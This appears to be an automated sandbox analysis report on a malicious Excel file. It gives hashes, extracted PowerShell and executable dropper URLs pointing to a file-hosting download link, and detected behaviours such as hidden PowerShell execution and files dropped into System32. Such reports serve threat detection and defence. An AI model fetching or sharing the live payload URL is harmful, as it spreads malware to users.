General

  • Target

    ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls

  • Size

    1.1MB

  • Sample

    241113-dkbsmswarr

  • MD5

    01c16c040fe7d4ea91adf63333f925f8

  • SHA1

    265e06375fb597735faca5f7345cf7e67619f728

  • SHA256

    ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed

  • SHA512

    e68f8fae49c6f8808f2821c0c0a3f2948227bf2ef3bcea6b5c91eec4543bb587063441d96c1fe31f1b1516a5a738d882b3e6904f81e06b26c2399e7b02dcc84e

  • SSDEEP

    24576:gq9PLiijE2Z5Z2am8F9sPxQtF84LJQodsshoe2gVm:gEPLiij7Z5ZK8F9vFjLJQodK

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Targets

    • Target

      ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls

    • Size

      1.1MB

    • MD5

      01c16c040fe7d4ea91adf63333f925f8

    • SHA1

      265e06375fb597735faca5f7345cf7e67619f728

    • SHA256

      ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed

    • SHA512

      e68f8fae49c6f8808f2821c0c0a3f2948227bf2ef3bcea6b5c91eec4543bb587063441d96c1fe31f1b1516a5a738d882b3e6904f81e06b26c2399e7b02dcc84e

    • SSDEEP

      24576:gq9PLiijE2Z5Z2am8F9sPxQtF84LJQodsshoe2gVm:gEPLiij7Z5ZK8F9vFjLJQodK

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Evasion via Device Credential Deployment

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks